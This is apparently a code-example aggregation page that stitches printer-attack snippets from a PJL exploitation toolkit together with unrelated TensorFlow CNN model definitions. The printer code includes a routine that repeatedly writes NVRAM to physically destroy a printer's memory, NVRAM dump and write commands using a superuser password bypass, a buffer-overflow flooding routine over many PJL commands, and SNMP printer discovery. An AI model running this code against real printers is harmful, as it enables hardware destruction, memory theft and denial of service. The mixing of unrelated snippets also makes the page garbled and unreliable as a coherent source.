Пример #1
0
 def do_destroy(self, arg):
   "Cause physical damage to printer's NVRAM."
   self.logger.warning("Warning: This command tries to cause physical damage to the")
   self.logger.warning("printer NVRAM. Use at your own risk. Press CTRL+C to abort.")
   if self.logger.countdown("Starting NVRAM write cycle loop in...", 10, self):
     self.chitchat("Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?")
     date = conv().now() # timestamp the experiment started
     steps = 100 # number of pjl commands to send at once
     chunk = ['@PJL DEFAULT COPIES=' + str(n%(steps-2)) for n in range(2, steps)]
     for count in range(0, 10000000):
       # test if we can still write to nvram
       if count%10 == 0:
         self.do_set("COPIES=42" + arg, False)
         copies = self.cmd('@PJL DINQUIRE COPIES') or '?'
         if not copies or '?' in copies:
           self.logger.chitchat("I'm sorry Dave, I'm afraid I can't do that.")
           if count > 0: self.logger.chitchat("Device crashed?")
           return
         elif not '42' in copies:
           self.chitchat("\rI'm afraid. I'm afraid, Dave. Dave, my mind is going...")
           dead = conv().elapsed(conv().now() - date)
           self.logger.printAndWrite("NVRAM died after " + str(count*steps) + " cycles, " + dead)
           return
       # force writing to nvram using by setting a variable many times
       self.chitchat("\rNVRAM write cycles:  " + str(count*steps), '')
       self.cmd(c.EOL.join(chunk) + c.EOL + '@PJL INFO ID')
   print # echo newline if we get this far
Пример #2
0
 def do_nvram(self, arg):
   # dump nvram
   if arg.startswith('dump'):
     bs = 2**9    # memory block size used for sampling
     max = 2**18  # maximum memory address for sampling
     steps = 2**9 # number of bytes to dump at once (feedback-performance trade-off)
     lpath = os.path.join('nvram', self.basename(self.target)) # local copy of nvram
     #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
     # ******* sampling: populate memspace with valid addresses ******
     if len(re.split("\s+", arg, 1)) > 1:
       memspace = []
       commands = ['@PJL RNVRAM ADDRESS=' + str(n) for n in range(0, max, bs)]
       self.chitchat("Sampling memory space (bs=" + str(bs) + ", max=" + str(max) + ")")
       for chunk in (list(chunks(commands, steps))):
         str_recv = self.cmd(c.EOL.join(chunk))
         # break on unsupported printers
         if not str_recv: return
         # collect valid memory addresses
         blocks = re.findall('ADDRESS\s*=\s*(\d+)', str_recv)
         for addr in blocks: memspace += range(conv().int(addr), conv().int(addr) + bs)
         self.chitchat(str(len(blocks)) + " blocks found. ", '')
     else: # use fixed memspace (quick & dirty but might cover interesting stuff)
       memspace = range(0, 8192) + range(32768, 33792) + range(53248, 59648)
     #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
     # ******* dumping: read nvram and write copy to local file ******
     commands = ['@PJL RNVRAM ADDRESS=' + str(n) for n in memspace]
     self.chitchat("Writing copy to " + lpath)
     if os.path.isfile(lpath): file().write(lpath, '') # empty file
     for chunk in (list(chunks(commands, steps))):
       str_recv = self.cmd(c.EOL.join(chunk))
       if not str_recv: return # break on unsupported printers
       else: self.makedirs('nvram') # create nvram directory
       data = ''.join([conv().chr(n) for n in re.findall('DATA\s*=\s*(\d+)', str_recv)])
       file().append(lpath, data) # write copy of nvram to disk
       self.logger.dump(data) # print asciified output to screen
     print
   #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
   # read nvram (single byte)
   elif arg.startswith('read'):
     arg = re.split("\s+", arg, 1)
     if len(arg) > 1:
       arg, addr = arg
       self.logger.info(self.cmd('@PJL RNVRAM ADDRESS=' + addr))
     else: self.help_nvram()
   #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
   # write nvram (single byte)
   elif arg.startswith('write'):
     arg = re.split("\s+", arg, 2)
     if len(arg) > 2:
       arg, addr, data = arg
       self.cmd('@PJL SUPERUSER PASSWORD=0' + c.EOL
              + '@PJL WNVRAM ADDRESS=' + addr + ' DATA=' + data + c.EOL
              + '@PJL SUPERUSEROFF', False)
     else: self.help_nvram()
   else:
     self.help_nvram()
def LeNet3(input_tensor, keep_prob, training):
    
    conv1 = conv(input_tensor, training, filters=1, padding='VALID', name='conv1', G=1) # 28x28x1
    conv2 = conv(conv1, training, filters=20, strides=2, padding='VALID', name='conv2', G=1) # 12x12x20
    conv2 = tf.nn.dropout(conv2, keep_prob)
    conv3 = conv(conv2, training, filters=20, strides=2, padding='VALID', name='conv3', G=1) # 4x4x20
    conv4 = conv(conv3, training, filters=80, kernel_size=2, strides=2, padding='VALID', name='conv4', G=1) # 2x2x40
    conv5 = conv(conv4, training, filters=43, kernel_size=2, padding='VALID', name='conv5', G=1) # 1x1x43

    return tf.contrib.layers.flatten(conv5)
def AllCNN32(input_tensor, keep_prob, training):

    conv1 = conv(input_tensor, training, filters=96, strides=2, name='conv1')
    conv2 = conv(conv1, training, filters=96, strides=2, name='conv2')
    conv3 = conv(conv2, training, filters=96, strides=2, name='conv3')

    drop1 = tf.nn.dropout(conv3, keep_prob)

    conv4 = conv(drop1, training, filters=192, strides=2, name='conv4')
    conv5 = conv(conv4, training, filters=192, strides=2, name='conv5')
    conv6 = conv(conv5,
                 training,
                 filters=192,
                 kernel_size=1,
                 strides=2,
                 name='conv6')

    drop2 = tf.nn.dropout(conv6, keep_prob)

    conv7 = conv(drop2, training, filters=192, kernel_size=1, name='conv7')
    conv8 = conv(conv7, training, filters=192, kernel_size=1, name='conv8')

    fcl1 = tf.contrib.layers.flatten(conv8)
    logits = tf.layers.dense(fcl1, 43)

    return logits
Пример #5
0
def recv(dispatcher, domain, address, msg):
    while msg:
        msg_recv, msg = decoder.decode(msg, asn1Spec=pmod.Message())
        pdu_recv = pmod.apiMessage.getPDU(msg_recv)
        # match response to request as we're broadcasting
        if pmod.apiPDU.getRequestID(pdu_send) == pmod.apiPDU.getRequestID(
                pdu_recv):
            ipaddr = address[0]
            device = '?'
            uptime = '?'
            status = '?'
            prstat = 0
            # retrieve device properties
            for oid, val in pmod.apiPDU.getVarBinds(pdu_recv):
                oid, val = oid.prettyPrint(), val.prettyPrint()
                # skip non-printer devices
                if oid == '1.3.6.1.2.1.25.3.2.1.2.1' and val != '1.3.6.1.2.1.25.3.1.5':
                    return
                # harvest device information
                if oid == '1.3.6.1.2.1.25.3.2.1.3.1': device = val
                if oid == '1.3.6.1.2.1.1.3.0':
                    uptime = conv().elapsed(val, 100, True)
                if oid == '1.3.6.1.2.1.43.16.5.1.2.1.1': status = val
                if oid == '1.3.6.1.2.1.25.3.2.1.5.1' and val: prstat = val[:1]
            dispatcher.jobFinished(1)
            results[ipaddr] = [device, uptime, status, prstat]
Пример #6
0
 def do_ls(self, arg):
   "List contents of virtual file system:  ls"
   pclfs = self.dirlist()
   if not pclfs: # no files have yet been uploaded
     self.logger.raw("This is a virtual pclfs. Use 'put' to upload files.")
   # list files with syntax highlighting
   for name, (id, size, date) in sorted(pclfs.items()):
     self.logger.pcldir(size, conv().lsdate(int(date)), id, name)
def LeNet4(input_tensor, keep_prob, training):
    conv1 = conv(input_tensor,
                 training,
                 filters=6,
                 kernel_size=5,
                 strides=1,
                 padding='VALID',
                 name='conv1',
                 G=2)
    pool1 = tf.layers.max_pooling2d(conv1,
                                    pool_size=2,
                                    strides=2,
                                    padding='VALID',
                                    name='pool1')
    conv2 = conv(pool1,
                 training,
                 filters=16,
                 kernel_size=5,
                 strides=1,
                 padding='VALID',
                 name='conv2',
                 G=4)
    pool2 = tf.layers.max_pooling2d(conv2,
                                    pool_size=2,
                                    strides=2,
                                    padding='VALID',
                                    name='pool2')
    conv3 = conv(pool2,
                 training,
                 filters=400,
                 kernel_size=5,
                 strides=1,
                 padding='VALID',
                 name='conv3',
                 G=10)

    # Flatten. Input = 5x5x16. Output = 400.
    fc0 = tf.contrib.layers.flatten(pool2)
    # Flatten. Input = 5x5x16. Output = 400.
    fc1 = tf.contrib.layers.flatten(conv3)
    # Concat layer2flat and x. Input = 400 + 400. Output = 800
    concat_x = tf.concat([fc1, fc0], 1)
    # Dropout
    concat_x = tf.nn.dropout(concat_x, keep_prob)
    logits = tf.layers.dense(concat_x, units=43, activation='elu')
    return logits
Пример #8
0
 def do_get(self, arg, lpath="", r=True):
     "Receive file:  get <file>"
     if not arg:
         arg = raw_input("Remote file: ")
     if not lpath:
         lpath = self.basename(arg)
     path = self.rpath(arg) if r else arg
     str_recv = self.get(path)
     if str_recv != c.NONEXISTENT:
         rsize, data = str_recv
         lsize = len(data)
         # fix carriage return chars added by some devices
         if lsize != rsize and len(conv().nstrip(data)) == rsize:
             lsize, data = rsize, conv().nstrip(data)
         # write to local file
         file().write(lpath, data)
         if lsize == rsize:
             print(str(lsize) + " bytes received.")
         else:
             self.size_mismatch(rsize, lsize)
Пример #9
0
 def put(self, path, data):
   path = self.basename(path)
   pclfs = self.dirlist()
   # re-use macro id if file name already present
   if path in pclfs: id = pclfs[path][0]
   # find free macro id not already reserved for file
   else: id = str(item(set(c.BLOCKRANGE).difference(self.idlist())))
   # abort if we have used up the whole macro id space
   if not id: return self.logger.warning("Out of macro slots.")
   self.chitchat("Using macro id #" + id)
   # retrieve and update superblock
   size = str(len(data))
   date = str(conv().now())
   pclfs[path] = [id, size, date]
   self.update_superblock(pclfs)
   # save data as pcl macro on printer
   self.define_macro(id, data)
Пример #10
0
 def do_flood(self, arg):
   "Flood user input, may reveal buffer overflows: flood <size>"
   size = conv().int(arg) or 10000 # buffer size
   char = '0' # character to fill the user input
   # get a list of printer-specific variables to set
   self.chitchat("Receiving PJL variables.", '')
   lines = self.cmd('@PJL INFO VARIABLES').splitlines()
   variables = [var.split('=', 1)[0] for var in lines if '=' in var]
   self.chitchat(" Found " + str(len(variables)) + " variables.")
   # user input to flood = custom pjl variables and command parameters
   inputs = ['@PJL SET ' + var + '=[buffer]' for var in variables] + [
     ### environment commands ###
     '@PJL SET [buffer]',
     ### generic parsing ###
     '@PJL [buffer]',
     ### kernel commands ###
     '@PJL COMMENT [buffer]',
     '@PJL ENTER LANGUAGE=[buffer]',
     ### job separation commands ###
     '@PJL JOB NAME="[buffer]"',
     '@PJL EOJ NAME="[buffer]"',
     ### status readback commands ###
     '@PJL INFO [buffer]',
     '@PJL ECHO [buffer]',
     '@PJL INQUIRE [buffer]',
     '@PJL DINQUIRE [buffer]',
     '@PJL USTATUS [buffer]',
     ### device attendance commands ###
     '@PJL RDYMSG DISPLAY="[buffer]"',
     ### file system commands ###
     '@PJL FSQUERY NAME="[buffer]"',
     '@PJL FSDIRLIST NAME="[buffer]"',
     '@PJL FSINIT VOLUME="[buffer]"',
     '@PJL FSMKDIR NAME="[buffer]"',
     '@PJL FSUPLOAD NAME="[buffer]"']
   for val in inputs:
     self.logger.raw("Buffer size: " + str(size) + ", Sending: ", val + os.linesep)
     self.timeoutcmd(val.replace('[buffer]', char*size), self.timeout*10, False)
   self.cmd("@PJL ECHO") # check if device is still reachable
Пример #11
0
 def echo2data(self, echo):
   data = ''
   echo = re.findall("ECHO (\d+)", echo)
   for n in echo:
     data += conv().chr(n)
   return data
Пример #12
0
 def file_exists(self, path):
   str_recv = self.cmd('@PJL FSQUERY NAME="' + path + '"', True, False)
   size = re.findall("TYPE\s*=\s*FILE\s+SIZE\s*=\s*(\d*)", str_recv)
   # return file size
   return conv().int(item(size, c.NONEXISTENT))
Пример #13
0
# third party modules
try:
    from pysnmp.carrier.asyncore.dispatch import AsyncoreDispatcher
    from pysnmp.carrier.asyncore.dgram import udp
    from pysnmp.proto import api
    from pyasn1.codec.ber import encoder, decoder
    snmp_modules_found = True
except ImportError:
    snmp_modules_found = False

########################################################
### Most of this code comes from the PySNMP examples ###
### and needs to be refactored into an 'snmp' class! ###
########################################################

start = conv().now()  # get current time
timeout = 0.5  # be quick and dirty
maxhost = 999  # max printers to list
results = {}  # dict of found printers

try:
    # use snmp v1 because it is most widely supported among printers
    pmod = api.protoModules[api.protoVersion1]
    pdu_send = pmod.GetRequestPDU()  # build protocol data unit (pdu)
except:
    pass


# cause timeout interrupt
class stop_waiting(Exception):
    pass